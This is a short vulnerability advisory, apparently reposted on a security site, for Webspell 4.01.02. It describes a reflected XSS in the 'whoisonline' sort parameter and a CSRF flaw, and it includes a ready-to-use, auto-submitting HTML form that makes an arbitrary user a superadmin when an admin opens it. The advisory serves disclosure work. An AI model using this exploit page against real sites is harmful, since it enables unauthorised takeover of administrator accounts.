Webspell 4.01.02 2 Vulnerabilites

2008.02.05
Credit: nbbn gmx net
Risk: Low
Local: No
Remote: Yes
CWE: N/A

######################################################################## ################ Webspell 4.01.02 2 Vulnerabilites Founded by NBBN Vendor: http://cms.webspell.org ######################################################################## ################ 1) Cross-Site Scripting Vulnerability 2) Change User Permission XSRF Vulnerability 1) http://site.tld/path/index.php?site=whoisonline&sort=">[xss code] 2) This creates a superadmin account, when an admin click a link, to a site with the following code: <html> <head> <title>Superadmin Creator</title> </head> <body onLoad=javascript:document.formular.submit()> <form name="formular" action="http://site.tld/webspell/admin/admincenter.php?site=members" method="POST"> <input type="hidden" name="superadmin" value="1"> <input type="hidden" name="id" value="3"> <!-- userid --> <input type="hidden" name="saveedit" value="update+member"> </form> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top